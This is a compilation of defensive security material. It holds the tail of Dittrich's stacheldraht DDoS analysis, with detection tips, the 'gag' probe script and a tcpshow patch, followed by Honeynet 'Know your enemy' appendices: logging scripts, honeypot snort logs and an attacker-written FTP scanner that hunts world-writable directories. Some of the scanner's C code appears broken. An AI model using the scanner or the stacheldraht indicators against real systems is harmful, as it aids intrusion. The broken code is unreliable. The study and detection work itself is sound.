mserv   1091 root  mem    REG    3,3 4016683 30729 /lib/libc-2.1.1.so
mserv   1091 root    0u   CHR  136,4            6 /dev/pts/4
mserv   1091 root    1u   CHR  136,4            6 /dev/pts/4
mserv   1091 root    2u   CHR  136,4            6 /dev/pts/4
mserv   1091 root    3r  FIFO    0,0         2240 pipe
mserv   1091 root    4u  inet          2215       TCP 192.168.0.1:16660->10.0.0.1:1029 (ESTABLISHED)
mserv   1091 root    5w  FIFO    0,0         2240 pipe
------------------------------------------------------------------------------

The agent, which also forks when in use, looks like this:

------------------------------------------------------------------------------
# lsof -c ttymon
COMMAND PID USER   FD   TYPE DEVICE    SIZE  NODE NAME
ttymon  437 root  cwd    DIR    3,1    1024 37208 /usr/lib/libx/...
ttymon  437 root  rtd    DIR    3,1    1024     2 /
ttymon  437 root  txt    REG    3,1  324436 37112 /usr/lib/libx/.../ttymon
ttymon  437 root  mem    REG    3,1  243964 29140 /lib/libnss_files-2.1.1.so
ttymon  437 root  mem    REG    3,1 4016683 29115 /lib/libc-2.1.1.so
ttymon  437 root  mem    REG    3,1  342206 28976 /lib/ld-2.1.1.so
ttymon  437 root    3u  sock    0,0          779 can't identify protocol
ttymon  449 root  cwd    DIR    3,1    1024 37208 /usr/lib/libx/...
ttymon  449 root  rtd    DIR    3,1    1024     2 /
ttymon  449 root  txt    REG    3,1  324436 37112 /usr/lib/libx/.../ttymon
ttymon  449 root    0u  inet           811       TCP *:32222 (LISTEN)
ttymon  449 root    3u  sock    0,0          779 can't identify protocol
------------------------------------------------------------------------------

Defenses
--------

Because the programs use ICMP_ECHOREPLY packets for communication, it
will be very difficult (if not impossible) to block it without breaking
most Internet programs that rely on ICMP. The Phrack paper on LOKI states:

    The only sure way to destroy this channel is to deny ALL ICMP_ECHO
    traffic into your network.

Short of rejecting this traffic, it will instead be necessary to observe
the difference between "normal" use of ICMP_ECHO and ICMP_ECHOREPLY
packets by programs like "ping". This will not be an easy task,
especially on large networks. (See the LOKI paper for more details.)

The real defense is to make sure that *all* systems are kept up to date
with security patches, unnecessary services are turned off, and competent
system administrators are running and monitoring every Unix system on
your network. (I'll hold my breath while you go make that happen, OK? ;)

Weaknesses
----------

If the source has not been modified, you can identify stacheldraht
clients/handlers/agents by the embedded strings shown earlier.

The .distro command uses the Berkeley "rcp" command for obtaining updated
copies of the agent. Monitoring "rcp" connections (514/tcp) from multiple
systems on your network, in quick succession, to a single IP address
outside your network would be a good trigger. (Note that the use of "rcp"
in this form requires an anonymous trust relationship, usually in the
form of "+ +" in a user's ~/.rhosts file, which also will allow you to
immediately archive the contents of this account while contacting the
owners to preserve evidence.)

The IP spoof test uses a constant source address of "3.3.3.3".
Watch for this to show up in the source address of outgoing unsolicited ICMP_ECHOREPLY packets. (If you do RFC 2267 style egress filtering, you will have to watch for these packets from somewhere inside your border routers, or on each subnet. Ethernet switches will make this more difficult to do on local subnets, so an intrusion detection system (IDS) just inside your borders would be the best way to do this for your entire network.) Since stacheldraht uses ICMP_ECHOREPLY packets for some of its functioning, and those TCP connections that it uses employ Blowfish encryption of the data stream, it will be difficult to detect stacheldraht in action, and the ICMP_ECHOREPLY packets will go right through most firewalls. Programs like "ngrep" do not process ICMP packets, so you will not as easily (at this point in time) be able to watch for strings in the data portion of the ICMP packets (except using the patches to tcpshow from Appendix C and patches to sniffit provided in the analysis of TFN). Stacheldraht does not authenticate the source of ICMP packets, and also does not encrypt strings embedded in ICMP packets. If the command values have not been changed from the default, as few as just one packet would be necessary to flush out an agent. Either: a). send an ICMP_ECHOREPLY packet with an ID field value of 668 and watch for an ICMP_ECHOREPLY packet to come back with an ID field value of 669 and the string "sicken\n" in the data field, or b). send an ICMP_ECHOREPLY packet with a source address of "3.3.3.3" (and ID value of 666 and data field with "skillz" if you want to go all out) and watch for an ICMP_ECHOREPLY packet to come back with an ID field value of 1000 and the string "spoofworks" in the data field. (A Perl script using Net::RawIP named "gag" has been developed to accomplish the former. See Appendix A). 
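A passive matcher for the indicators listed above, as an added example that is not part of Dittrich's analysis or the gag script: it parses raw IPv4/ICMP packets the way a sniffer hands them over and reports which default stacheldraht markers each ICMP_ECHOREPLY carries (command ID, cleartext string, 3.3.3.3 source). The packets it checks are constructed here, not captures.

```python
"""Passive check of ICMP echo replies for the default stacheldraht markers."""
import ipaddress
import struct
from typing import Dict, List, NamedTuple, Optional

# Indicators from the analysis above: default command IDs in the ICMP id field,
# cleartext strings in the ICMP data, and the fixed source of the spoof test.
SUSPECT_ICMP_IDS = {666, 667, 668, 669, 1000}
SUSPECT_STRINGS = (b"skillz", b"spoofworks", b"sicken", b"niggahbitch", b"ficken")
SPOOF_TEST_SOURCE = "3.3.3.3"
ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8


class IcmpEcho(NamedTuple):
    src: str
    dst: str
    icmp_type: int
    icmp_id: int
    seq: int
    data: bytes


def parse_icmp_echo(packet: bytes) -> Optional[IcmpEcho]:
    """Parse an IPv4 datagram; return None unless it carries an ICMP echo or echo reply."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != 1 or len(packet) < ihl + 8:          # IP protocol 1 = ICMP
        return None
    src = str(ipaddress.IPv4Address(packet[12:16]))
    dst = str(ipaddress.IPv4Address(packet[16:20]))
    icmp_type, _code, _cksum, icmp_id, seq = struct.unpack("!BBHHH", packet[ihl:ihl + 8])
    if icmp_type not in (ICMP_ECHO_REPLY, ICMP_ECHO_REQUEST):
        return None
    return IcmpEcho(src, dst, icmp_type, icmp_id, seq, packet[ihl + 8:])


def stacheldraht_indicators(packet: bytes) -> List[str]:
    """Names of the markers an echo reply matches; empty for anything else."""
    echo = parse_icmp_echo(packet)
    if echo is None or echo.icmp_type != ICMP_ECHO_REPLY:
        return []
    hits = []
    if echo.icmp_id in SUSPECT_ICMP_IDS:
        hits.append(f"id={echo.icmp_id}")
    hits.extend(f"string={s.decode()}" for s in SUSPECT_STRINGS if s in echo.data)
    if echo.src == SPOOF_TEST_SOURCE:
        hits.append(f"src={SPOOF_TEST_SOURCE}")
    return hits


def build_echo_reply(src: str, dst: str, icmp_id: int, seq: int, data: bytes) -> bytes:
    """Build a minimal IPv4/ICMP echo reply for the samples (checksums left at zero)."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28 + len(data), 0, 0, 64, 1, 0,
                         ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return ip_hdr + struct.pack("!BBHHH", ICMP_ECHO_REPLY, 0, 0, icmp_id, seq) + data


# Constructed samples, not captures.  The first two mirror the exchanges described
# above (an agent answering the 668 test, an agent's spoof-test probe); the third
# is an ordinary ping reply and must not match anything.
SAMPLES: Dict[str, bytes] = {
    "agent test reply": build_echo_reply("10.0.0.5", "192.0.2.1", 669, 0, b"sicken\n"),
    "spoof test probe": build_echo_reply("3.3.3.3", "192.0.2.1", 666, 0, b"skillz"),
    "ordinary ping reply": build_echo_reply("192.0.2.9", "192.0.2.1", 0x1234, 7, b"abcdefgh"),
}


def scan(samples: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Run the matcher over every sample and return the hits per sample name."""
    return {name: stacheldraht_indicators(pkt) for name, pkt in samples.items()}


if __name__ == "__main__":
    for name, hits in scan(SAMPLES).items():
        print(f"{name}: {', '.join(hits) or 'no indicators'}")
```

The same checks map onto a tcpdump filter such as the `icmp[4:2] = 669` expression used by gag, but matching on the data strings and on the 3.3.3.3 source needs the packet body, which is why the parser takes whole datagrams.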
The next logical evolutionary steps
-----------------------------------

When I first started analyzing trinoo source code back in early October, and after having observed TFN binaries in action just after that, it was obvious to me that encryption of communication channels and more automated maintenance of large networks was in active development. Discussions with others at the CERT workshop in November brought out many other new feature ideas that I'm sure the underground is also thinking of.

Having now seen the stacheldraht code, and that of yet another unreleased distributed denial of service attack tool (for a total of four different handler/agent distributed DoS tools found "in the wild" this year), the assumptions about the evolution of these tools appear to have been correct, even if the code remains a bit unfinished and with a few bugs (e.g., installations witnessed as late as December 20 continue to include cron entries that re-start the agent every minute!)

I can't wait to see what the New Year will bring. ;) :( ?? @#$%^&*!!!

--
David Dittrich
http://staff.washington.edu/dittrich/

Appendix A - Perl script "gag" to detect stacheldraht agents
------------------------------------------------------------

------------------------------- cut here -----------------------------------
#!/usr/bin/perl
#
# gag v. 1.0
# By Dave Dittrich
#
# Send an ICMP_ECHOREPLY packet with ID of 668 to a stacheldraht
# agent, causing it to reply to the sending host with an
# ICMP_ECHOREPLY packet with an ID of 669 and the string "sicken\n"
# in the data field of the packet.  Watch for this with tcpdump,
# sniffit, etc., e.g.:
#
#   # tcpdump -s 1500 -w stach.dump 'icmp[4:2] = 669'
#   # tcpshow < stach.dump
#
# Needs Net::RawIP (http://quake.skif.net/RawIP)
# Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z)
#
# Example: ./gag [options] host1 [host2 [...]]
#
# (This code was hacked from the "macof" program, written by
# Ian Vitek)

require 'getopts.pl';
use Net::RawIP;
require 'netinet/in.ph';

$a = new Net::RawIP({icmp => {}});
chop($hostname = `hostname`);

Getopts('a:c:f:i:vh');
die "usage: $0 [options] iplist\
\t-a arg\t\tSend command argument 'arg' (default \"gesundheit!\")\
\t-c val\t\tSend command value 'val' (default 668 - ID_TEST)\
\t-f from_host\t\t(default:$hostname)\
\t-i interface \t\tSet sending interface (default:eth0)\
\t-v\t\t\tVerbose\
\t-h This help\n" unless ( !$opt_h );

# set default values
$opt_i = ($opt_i) ? $opt_i : "eth0";
$opt_a = ($opt_a) ? $opt_a : "gesundheit!";
$opt_c = ($opt_c) ? $opt_c : "668";

# choose network card
if($opt_e) {
  $a->ethnew($opt_i, dest => $opt_e);
} else {
  $a->ethnew($opt_i);
}

# source address of the probe comes from -f; defaults to this host
$s_host = ($opt_f) ? $opt_f : $hostname;

# the single argument names a file listing one target host per line
if ($ARGV[0]) {
  open(I,"<$ARGV[0]") || die "could not open file: '$ARGV[0]'";
  while (<I>) {
    chop;
    push(@list,$_);
  }
  close(I);
}

# Put value in network byte order (couldn't get htons() in
# "netinet/in.ph" to work.  Go figure.)
$id = unpack("S", pack("n", $opt_c));

# one ICMP_ECHOREPLY (type 0) per target, carrying the command ID and argument
foreach $d_host (@list) {
  $a->set({ip => {saddr => $s_host, daddr => $d_host},
           icmp => {type => 0, id => $id, data => $opt_a}
          });
  print "sending packet [$opt_c/\"$opt_a\"] to $d_host\n" if $opt_v;
  $a->send;
}

exit(0);
------------------------------- cut here -----------------------------------

Appendix B - References
-----------------------

TCP/IP Illustrated, Vol. I, II, and III. W. Richard Stevens and Gary R. Wright, Addison-Wesley.
The DoS Project's "trinoo" distributed denial of service attack tool
http://staff.washington.edu/dittrich/misc/trinoo.analysis

The "Tribe Flood Network" distributed denial of service attack tool
http://staff.washington.edu/dittrich/misc/tfn.analysis

CERT Distributed System Intruder Tools Workshop report
http://www.cert.org/reports/dsit_workshop.pdf

CERT Advisory CA-99-17 Denial-of-Service Tools
http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html

Distributed denial of service attack tools at Packet Storm Security
http://packetstorm.securify.com/distributed/

tcpdump: ftp://ftp.ee.lbl.gov/tcpdump.tar.Z
tcpshow: http://packetstorm.securify.com/linux/trinux/src/tcpshow.c
sniffit: http://sniffit.rug.ac.be/sniffit/sniffit.html
Net::RawIP: http://quake.skif.net/RawIP

loki client/server:
Phrack Magazine, Volume Seven, Issue Forty-Nine, File 06 of 16, [ Project Loki ]
http://www.phrack.com/search.phtml?view&article=p49-6
Phrack Magazine Volume 7, Issue 51, September 01, 1997, article 06 of 17, [ L O K I 2 (the implementation) ]
http://www.phrack.com/search.phtml?view&article=p51-6

libnet: http://www.packetfactory.net/libnet

----------------------------------------------------------------------------

Appendix C: Patches to tcpshow 1.0 to display ICMP ECHO id/seq
----------------------------------------------------------------------

diff -c tcpshow/tcpshow.c tcpshow.orig/tcpshow.c *** tcpshow/tcpshow.c Mon Dec 27 16:21:54 1999 --- tcpshow.orig/tcpshow.c Thu Oct 21 14:12:19 1999 *************** *** 1081,1088 **** uint2 nskipped; uint1 type; char *why; - uint2 echo_id; - uint2 echo_seq; type = getbyte(&pkt); nskipped = sizeof(type); --- 1081,1086 ---- *************** *** 1093,1103 **** /* Must calculate it from the size of the IP datagram - the IP header.
*/ datalen -= ICMPHDRLEN; - if (type == ECHO_REQ || type == ECHO_REPLY) { - echo_id = getword(&pkt); nskipped += sizeof(cksum); - echo_seq = getword(&pkt); nskipped += sizeof(cksum); - } - why = icmpcode(type, code); if (dataflag) { printf( --- 1091,1096 ---- *************** *** 1120,1129 **** icmptype(type), why? "\n\tBecause:\t\t\t": "", why? why: "" ); printf("\tChecksum:\t\t\t0x%04X\n", cksum); - if (type == ECHO_REQ || type == ECHO_REPLY) { - printf("\tId:\t\t\t\t0x%04X (%d)\n", echo_id, echo_id); - printf("\tSequence:\t\t\t0x%04X (%d)\n", ntohs(echo_seq), ntohs(echo_seq)); - } } return pkt; --- 1113,1118 ---- *************** *** 1194,1200 **** printf("\tVersion:\t\t\t4\n\tHeader Length:\t\t\t%d bytes\n", hlen); printf("\tService Type:\t\t\t0x%02X\n", (uint2)servtype); printf("\tDatagram Length:\t\t%d bytes\n", dgramlen); ! printf("\tIdentification:\t\t\t0x%04X (%d)\n", id, id); printf( "\tFlags:\t\t\t\tMF=%s DF=%s\n", (flags & MF) == MF? on: off, (flags & DF) == DF? on_e: off_e --- 1183,1189 ---- printf("\tVersion:\t\t\t4\n\tHeader Length:\t\t\t%d bytes\n", hlen); printf("\tService Type:\t\t\t0x%02X\n", (uint2)servtype); printf("\tDatagram Length:\t\t%d bytes\n", dgramlen); ! printf("\tIdentification:\t\t\t0x%04X\n", id); printf( "\tFlags:\t\t\t\tMF=%s DF=%s\n", (flags & MF) == MF? on: off, (flags & DF) == DF? on_e: off_e
----------------------------------------------------------------------

--
Dave Dittrich                  Client Services
dittrich@cac.washington.edu    Computing & Communications
                               University of Washington

Dave Dittrich / dittrich@cac.washington.edu
PGP 6.5.1 key fingerprint: FE 97 0C 57 08 43 F3 EB 49 A1 0C D0 8E 0C D0 BE C8 38 CC B5

EoF

Serverlog example Know your enemy #2
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

*.*                                     @192.168.41.15

# Log all kernel messages to the console.
# Logging much else clutters up the screen.
#kern.*                                 /dev/console

# Log anything (except mail) of level info or higher.
#Don't log private authentication messages!
*.info;mail.none;authpriv.none          /var/log/messages

# The authpriv file has restricted access.
authpriv.*                              /var/log/secure

# Log all the mail messages in one place.
mail.*                                  /var/log/maillog

# Log all ssh1 traffic
local1.info                             /var/log/sshdlog

# Everybody gets emergency messages, plus log them on another
# machine.
*.emerg                                 *

# Save mail and news errors of level err and higher in a
# special file.
uucp,news.crit                          /var/log/spooler

EoF

ftp-scan.c Know your enemy #2
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/*
 * ftpscan 1.o - by vENOMOUS of rdC - Mar 29, 1999
 *
 * This will open a specific file [-f file], get the IPs from it,
 * then, check if FTP port [ -p 21 ] is open and log the version.
 * If you specify the [ -o ] flag it will try log into the FTP
 * and execute LIST command [recursive], this is usefull
 * for see if there are any world writeable directories.
 *
 * You should know what you can do with that.
 *
 * credits: localip (lip) routine has been taken from queSO.
 *
 * Greets: ka0z [!thanks for the help, ideas and advices buddy!]
 *         - meengo
 *         #rdC - ub
 *
 */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include "blah.h"  /* taken from queSO */

char rdcopenfile(char g0d[257]);
void usage(char *damn);
void RDCconnect2(char host[1000], int puerto);
int bindit(int socket_type, u_short port, int *listener);
void sigh(int z);
u_long lip(void);  /* QueSO */

FILE *file;
FILE *fileout;
char ipsfile[256], bleh[100000][200], homer[256], beer[256], huhense[32];
u_long localip;
int sockfd, leen2=0, listing=0, sockfd1, ip1=0, ip2=0, ip3=0, ip4=0,
    lsock=-1, port2=-1, lala=0, dfinder=0, gotit=0, xx=0;

int main(int argc, char **argv)
{
  char arg;
  int p0rt=21;

  if ( argc < 3 ) {
    usage(argv[0]);
  }

  while ((arg = getopt(argc, argv, "f:p:o")) != EOF) {
    switch(arg) {
      case 'f':
        strncpy(ipsfile,optarg,128);
        break;
      case 'p':
        p0rt = atoi (optarg);
        break;
      case 'o':
        listing = 1;
        break;
      default:
        usage(argv[0]);
        break;
    }
  }

  while (dfinder < 5) {
    char disp[500];
    sprintf(disp,"ppp%d",dfinder);
    strcpy(huhense,disp);
    localip = lip();
    sscanf((char *) inet_ntoa(localip),"%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);
    if ((ip3 && ip4) != 0) {
      gotit=1;
      break;
    }
    dfinder++;
  }
  dfinder=0;
  if (gotit == 1) dfinder=6;
  while (dfinder < 5) {
    char disp[500];
    sprintf(disp,"eth%d",dfinder);
    strcpy(huhense,disp);
    localip = lip();
    sscanf((char *) inet_ntoa(localip),"%d.%d.%d.%d", &ip1, &ip2, &ip3,&ip4);
    if ((ip3 && ip4) != 0) {
      gotit=1;
      break;
    }
    dfinder++;
  }
  if (gotit == 0) {
    fprintf(stdout,"\nCannot define local ip address, aborting!\n\n");
    fflush(stdout);
    exit(1);
  }
  fprintf(stdout,"Local IP is %s\nStarting Scan... \n\n",inet_ntoa(localip));
  fflush(stdout);
  sprintf(beer,"PORT %d,%d,%d,%d,69,%d\nLIST -lR\n", ip1, ip2, ip3 ,ip4, 222 + lala);
  strlen(beer);
  rdcopenfile(ipsfile);
  for (xx = 0 ; xx < leen2 ; xx++) {
    RDCconnect2(bleh[xx], p0rt);
    lala++;
  }
}

char rdcopenfile(char g0d[257])
{
  int x;

  /* see if the file can be read... */
  if ((file=fopen(g0d,"r")) == NULL) {
    printf("\nftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99\n");
    printf("\nCannot open file %s for reading\n\n", g0d);
    exit(1);
  }
  /* get the all the lines */
  for ( ; fgets(bleh[leen2], 190, file) != NULL ; leen2++);
  fclose(file);
}

void RDCconnect2(char host[1000], int puerto)
{
  char versi0n[5000];
  int nmb;
  struct sockaddr_in beb;
  struct hostent *d0h;
  // struct timeval timev;

  beb.sin_family = AF_INET;
  beb.sin_port = htons(puerto);
  d0h = gethostbyname(host);
  if (!d0h) {
    if ( (beb.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) {
      printf("\nftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99\n");
      printf("\nPut a correct address\n\n");
      exit(0);
    }
  } else {
    bcopy( d0h->h_addr, (struct in_addr *) &beb.sin_addr, d0h->h_length);
  }
  strcpy(homer,"unable to connect: Connection refused");
  sockfd = socket(AF_INET, SOCK_STREAM,0);
  fprintf(stdout,"\n------------------------------------------------------------------------------n");
  fprintf(stdout,"IP: %s", host);
  fflush(stdout);
  signal(SIGALRM, sigh);
  alarm(10);
  if(connect(sockfd, (struct sockaddr *)&beb, sizeof(struct sockaddr)) < 0) {
    fprintf(stdout,"%s\n\n",homer);
    fflush(stdout);
    return;
  }
  alarm(0);
  bzero(versi0n, sizeof(versi0n));
  if ((nmb = recv(sockfd, versi0n, 5000, 0)) == -1) {
    fprintf(stdout,"Connection reset by peer?\n\n");
    fflush(stdout);
  }
  if (strlen(versi0n) == 0) {
    close(sockfd);
    return;
  }
  if (strstr(versi0n,"Microsoft") != NULL) {
    fprintf(stdout,"Skipping host, cuz its runing wind0ze\n\n");
    fflush(stdout);
    close(sockfd);
    return;
  }
  if (strstr(versi0n,"WinSock") != NULL) {
    fprintf(stdout,"Skipping host, cuz its runing wind0ze\n\n");
    fflush(stdout);
    close(sockfd);
    return;
  }
  if (strstr(versi0n,"NetWare") != NULL) {
    fprintf(stdout,"Skipping host cuz its runing NetWare\n\n");
    fflush(stdout);
    close(sockfd);
    return;
  }
  if (strstr(versi0n,"Proxy Server") != NULL) {
    fprintf(stdout,"Runing ProxyServer, skipping host\n\n");
    fflush(stdout);
    close(sockfd);
    return;
  }
  fprintf(stdout,"FTP banner:\n");
  fprintf(stdout,"%s\n",versi0n);
  fflush(stdout);

  if (listing == 1) {
    char username[70], sendear[17200], listit[100];
    int n;

    /* login in */
    strcpy(username,"anonymous");
    sprintf(sendear,"USER %s\n",username);
    fprintf(stdout,"Login as: %s\n",username);
    write(sockfd,sendear,strlen(sendear));
    read(sockfd,sendear,sizeof(sendear));
    if (strstr(sendear,"denied") != NULL) {
      fprintf(stdout,"Anonymous access denied, skipping\n\n");
      close(sockfd);
      return;
    }
    if (strstr(sendear,"USER anonymous") != NULL) {
      fprintf(stdout,"Remote host has closed the connection.\n\n");
      close(sockfd);
      return;
    }
    if (strstr(sendear,"unknown") != NULL) {
      fprintf(stdout,"Anonymous access unknown\n\n");
      close(sockfd);
      return;
    }
    if (strstr(sendear,"not found") != NULL) {
      fprintf(stdout,"User anonymous not found\n\n");
      close(sockfd);
      return;
    }
    fprintf(stdout,"Answer: %s\n",sendear);
    bzero(sendear, sizeof(sendear));
    fprintf(stdout,"Using password: bleh@\n");
    write(sockfd,"PASS bleh@\n",11);
    read(sockfd,sendear,sizeof(sendear));
    if (strstr(sendear,"Can't set") != NULL) {
      fprintf(stdout,"Cant set guest privileges\n\n");
      close(sockfd);
      return;
    }
    fprintf(stdout,"Answer: %s\n",sendear);
    bzero(sendear, sizeof(sendear));
    fprintf(stdout,"Setting PORT to %d\n",17886+lala);
    bzero(beer,sizeof(beer));
    sprintf(beer,"PORT %d,%d,%d,%d,69,%d\nLIST -lR\n",ip1, ip2, ip3 ,ip4, 222 + lala);
    write(sockfd,beer,strlen(beer) + 4);
    read(sockfd,beer,sizeof(beer));
    /* bind the port for data transfer */
    sockfd1 = bindit(SOCK_STREAM, port2, &lsock);
    read(sockfd,sendear,sizeof(sendear));
    fprintf(stdout,"Using LIST command\n");
    fprintf(stdout,"Answer: %s\n",sendear);
    bzero(sendear, sizeof(sendear));
    read(sockfd1,sendear,sizeof(sendear));
    fprintf(stdout,"Recursive list:\n %s\n",sendear);
    bzero(sendear, sizeof(sendear));
    fflush(stdout);
    // lala++;
  }
  close(sockfd);
  close(sockfd1);
}

int bindit(int socket_type, u_short port, int *listener)
{
  struct sockaddr_in address;
  int listening_socket;
  int connected_socket = -1;
  int reuse_addr = 1;
  char sendear[17200];

  port = htons(17886+lala);
  memset((char *) &address, 0, sizeof(address));
  address.sin_family = AF_INET;
  address.sin_port = port;
  address.sin_addr.s_addr = htonl(INADDR_ANY);
  listening_socket = socket(AF_INET, socket_type, 0);
  if (listening_socket < 0) {
    fprintf(stdout,"Cant recive list.\n\n");
    fflush(stdout);
    return;
  }
  if (listener != NULL)
    *listener = listening_socket;
  setsockopt(listening_socket, SOL_SOCKET, SO_REUSEADDR, &reuse_addr, sizeof(reuse_addr));
  if (bind(listening_socket, (struct sockaddr *) &address, sizeof(address)) < 0) {
    fprintf(stdout,"Error\n\n");
    fflush(stdout);
    close(listening_socket);
    exit(1);
  }
  listen(listening_socket, 1);
  signal(SIGALRM, sigh);
  alarm(10);
  while(connected_socket < 0) {
    connected_socket = accept(listening_socket, NULL, NULL);
  }
}

void sigh(int z)
{
  alarm(0);
  signal(SIGALRM, SIG_DFL);
  strcpy(homer,"Unable to connect: timeout");
}

u_long lip (void)
{
  int pvto, yesto, traversal;
  struct sockaddr_in *dim0n;
  struct ifreq *i;
  struct ifconf ic;
  char bufercito[512];

  pvto = socket (AF_INET, SOCK_STREAM, 0);
  ic.ifc_pum = 512;
  ic.ifc_buf = bufercito;
  ioctl (pvto, SIOCGIFCONF, (char *) &ic);
  i = ic.ifc_req;
  yesto = (ic.ifc_pum / sizeof(struct ifreq));
  for (traversal = 0; traversal < yesto; traversal++) {
    ioctl(pvto, SIOCGIFADDR, (char *) &i);
    dim0n = (struct sockaddr_in *) &i->ifr_ifru.ifru_addr;
    if (!strcmp (i->ifr_name, huhense))
      return dim0n->sin_addr.s_addr;
    i++;
  }
}

void usage(char *damn)
{
  printf("\n<[( ftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99 )]>");
  printf("<[( usage:\n");
  printf("<[( %s -f file [-p port] [-o]\n\n",damn);
  printf("<[( -f file: file is the IPs file.\n");
  printf("<[( -p port: port to connect to, default 21.\n");
  printf("<[( -o: with this flag, ftpscan will log into the FTPserver\n");
  printf("<[( as anonymous, and do a recursive list.\n\n");
  exit(0);
}

EoF

Scripts from Know your enemy #2
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From ant@notatla.demon.co.uk Tue May 2 13:26:38 2000
Date: Sun, 23 Apr 2000 20:35:11 +0100
From: Antonomasia
To: lance@spitzner.net
Subject: bash history logging

Lance,

In the bash-2.03 package of RH6.2 this mod will add history logging. It is done in the lib/readline/history.c file, concerned with recording commands rather than reading keystrokes, but the effect is almost the same.

One thing this doesn't record is when someone repeats the last command because that does not generate a new history record.

Just 2 things need to be added: an include of the syslog.h file and a syslog(3) call with the new history entry. I've split the syslog(3) section into 2 to cater for long and short lines separately because some syslog()s are/have been buggy.

1 /* History.c -- standalone history library */ 2 3 /* Copyright (C) 1989, 1992 Free Software Foundation, Inc. 32 #include + 33 #include 217 /* Place STRING at the end of the history list. The data field 218 is set to NULL. */ 219 void 220 add_history (string) 221 char *string; 222 { 223 HIST_ENTRY *temp; 224 + 225 if (strlen(string)<60) { + 226 syslog(LOG_INFO, "BASH2 HISTORY: PID=%d %s", getpid(), string); + 227 } else { + 228 char trunc[60]; + 229 + 230 strncpy(trunc,string,sizeof(trunc)); + 231 trunc[sizeof(trunc)-1]='\0'; + 232 syslog(LOG_INFO, "BASH2 HISTORY: PID=%d %s(++TRUNC)", + 233 getpid(), trunc); + 234 } 235 236 if (history_stifled && (history_length == max_input_history)) 237 { 238 register int i;

--
##############################################################
# Antonomasia   ant@notatla.demon.co.uk                      #
# See http://www.notatla.demon.co.uk/                        #
##############################################################

EoF

korn shell:
~~~~~~~~~~

#!/bin/ksh
#
# Created 20 April, 1999
# Lance Spitzner, lance@spitzner.net
#
# Shows last 10 entries of critical system logs.
# Build in some "artificial intelligence" using
# greps and sorts.  You can select a specific
# hosts logs, or you can select all hosts logs.
#

##### Define input
if [ "$1" = "all" ]; then
    system=":"
else
    system=$1
fi
log=$2

##### Define logs
inetdlog=/var/adm/inetdlog
messages=/var/adm/messages
syslog=/var/adm/syslog

##### Functions
inetdlog () {
    echo "\n\t--- Last 10 entries in $inetdlog ---\n"
    grep "$system" "$inetdlog" | grep -v "172.16.1." | tail -10
}

messages () {
    echo "\n\t--- Last 10 entries in $messages ---\n"
    grep "$system" "$messages" | egrep -v '(named|MARK)' | tail -10
}

syslog () {
    echo "\n\t--- Last 10 entries in $syslog ---\n"
    grep "$system" "$syslog" | tail -10
}

title () {
    if [ "$system" = ":" ]; then
        echo "\n### These are the log results of all systems ###"
    else
        echo "\n### These are the log results of system $system ###"
    fi
}

##### Actual program
case $log in
    inetdlog)
        title
        inetdlog
        ;;
    messages)
        title
        messages
        ;;
    syslog)
        title
        syslog
        ;;
    all)
        title
        inetdlog
        messages
        syslog
        ;;
    *)
        echo "\nUsage: `basename $0` "
        echo
        echo "\t "
        echo "\tCan either be a single source you want to grep"
        echo "\tfor in the log, or type \"all\" for all hosts in the"
        echo "\tlog file."
        echo
        echo "\t"
        echo "\tinetdlog -> for /var/log/inetdlog"
        echo "\tmessages -> for /var/log/messages"
        echo "\tsyslog   -> for /var/log/syslog"
        echo "\tall      -> for all three log files\n"
        ;;
esac
exit 0

honeypot activity logs : Know your enemy #3 : Forensics
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#
# All the probes my network received in a single month.
# Starting 15 April, 2000
#
# You can lookup the IDS number signatures at
# Max Vision's ArachNIDs database at
# http://www.whitehats.com
#
# Signatures captured using snort
# http://www.snort.org
#

Apr 15 13:40:41 mozart snort[7002]: IDS212/dns-zone-transfer: 207.239.115.11:2307 -> 172.16.1.101:53
Apr 16 02:45:37 mozart snort[7483]: IDS13/portmap-request-mountd: 200.190.13.181:1372 -> 172.16.1.107:111
Apr 16 07:17:06 mozart snort[7483]: IDS128/web-cgi-phf: 200.190.8.220:55220 -> 172.16.1.107:80
Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.101
Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.105
Apr 16 14:54:20 mozart snort[7483]: IDS171/Ping zeros: 24.201.15.148 -> 172.16.1.107
Apr 17 06:02:32 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.101:111
Apr 17 06:02:32 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.107:111
Apr 17 09:45:28 mozart snort[8255]: IDS198/SYN FIN Scan: 195.116.152.104:0 -> 172.16.1.105:111
Apr 19 08:00:19 mozart snort[3515]: IDS/DNS-version-query: 212.25.75.196:1723 -> 172.16.1.101:53
Apr 20 01:26:00 mozart snort[3515]: IDS212/dns-zone-transfer: 24.234.45.60:4075 -> 172.16.1.107:53
Apr 20 03:49:38 mozart snort[3515]: IDS/DNS-version-query: 216.123.23.5:4349 -> 172.16.1.101:53
Apr 20 03:49:39 mozart snort[3515]: IDS/DNS-version-query: 216.123.23.5:4350 -> 172.16.1.107:53
Apr 20 21:48:55 mozart snort[12353]: IDS246/large-icmp: 129.142.224.3 -> 172.16.1.107
Apr 20 21:48:55 mozart snort[12353]: IDS246/large-icmp: 129.142.224.3 -> 172.16.1.107
